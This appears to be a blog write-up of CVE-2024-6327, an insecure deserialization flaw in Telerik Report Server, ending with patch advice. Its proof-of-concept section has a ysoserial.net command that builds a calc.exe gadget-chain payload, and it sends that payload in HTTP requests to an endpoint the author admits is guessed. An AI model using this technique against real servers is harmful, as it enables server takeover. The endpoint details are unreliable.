CVE-2024-6327 - Remote Code Execution in Progress® Telerik® Report Server Exploited via Insecure Deserialization

A nasty bug has been found in Progress® Telerik® Report Server that lets attackers run their own code on a vulnerable server. This weakness, tracked as CVE-2024-6327, affects versions before 2024 Q2 (10.1.24.709) and allows bad actors to take over a server—all because of a problem called *insecure deserialization*.

In this post, I’ll walk you through what this bug is, how the attack works, and show you a basic example. If you’re running Telerik Report Server, make sure you read to the end for fix info.

What is Insecure Deserialization?

Deserialization means taking data (like a file or message) and turning it back into a usable object in code. If a server does this without properly checking the data, attackers can sneak in evil objects that run code or do dangerous things. That’s what goes wrong here.

Who is Impacted?

Anyone using Progress® Telerik® Report Server BEFORE 10.1.24.709 is at risk.

Vendor: Progress Software
Product: Telerik® Report Server
Versions Affected: before Q2 2024 (10.1.24.709)
CVE: CVE-2024-6327

Where’s the Bug?

Reportedly, the flaw sits in a part of Telerik Report Server that reads serialized (.NET) data sent by the client—for example, as part of SOAP or web API requests. If a malicious user sends carefully crafted data, the app trusts it and runs code.

What Can Attackers Do?

Remote Code Execution (RCE): Attackers can execute any .NET code on the server with the privileges of the process running the Telerik Report Server.

Proof of Concept (PoC) — Example Attack

Below is a simplified code example that shows how someone might create a malicious payload using ysoserial.net—a .NET gadget chain generator. (This is for educational/demo purposes only!)

Step 1: Create Malicious Payload

Install ysoserial.net (see github) and generate a payload to open the calculator (calc.exe) as a classic example:

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "calc.exe"

This outputs a base64 payload. Example

AAEAAAD... [snipped]

Step 2: Deliver Payload to Vulnerable Endpoint

Suppose the vulnerable endpoint is /api/upload (real endpoint names and request structure may vary):

Example HTTP POST

POST /api/upload HTTP/1.1
Host: telerik-vuln-server
Content-Type: application/octet-stream
Content-Length: 1234

[BASE64_PAYLOAD]

Or, if the endpoint accepts data in JSON

{
    "data": "[BASE64_PAYLOAD]"
}

Step 3: Command Executes

The Telerik server decodes, deserializes, and runs the payload—calc.exe opens, proving execution. An attacker could use PowerShell or download malware instead.

Immediate Fix

Update ASAP! Upgrade Telerik® Report Server to version 10.1.24.709 (Q2 2024) or later.
→ Telerik Report Server downloads / changelog

References

- Official CVE Record: CVE-2024-6327
- Progress Telerik Report Server Release Notes
- ysoserial.net (tool for exploiting .NET deserialization)
- OWASP: Insecure Deserialization

Conclusion

*CVE-2024-6327* is a serious threat—an unauthenticated attacker can hijack servers running unpatched versions of Telerik® Report Server. If you haven’t updated yet, do it now. Don’t forget to check server logs and tighten network access to prevent further issues.

Stay secure out there!

*Feel free to share this post with your IT teams or anyone running Telerik software. Let’s keep the internet safe.*

Timeline

Published on: 07/24/2024 14:15:06 UTC
Last modified on: 07/26/2024 13:03:00 UTC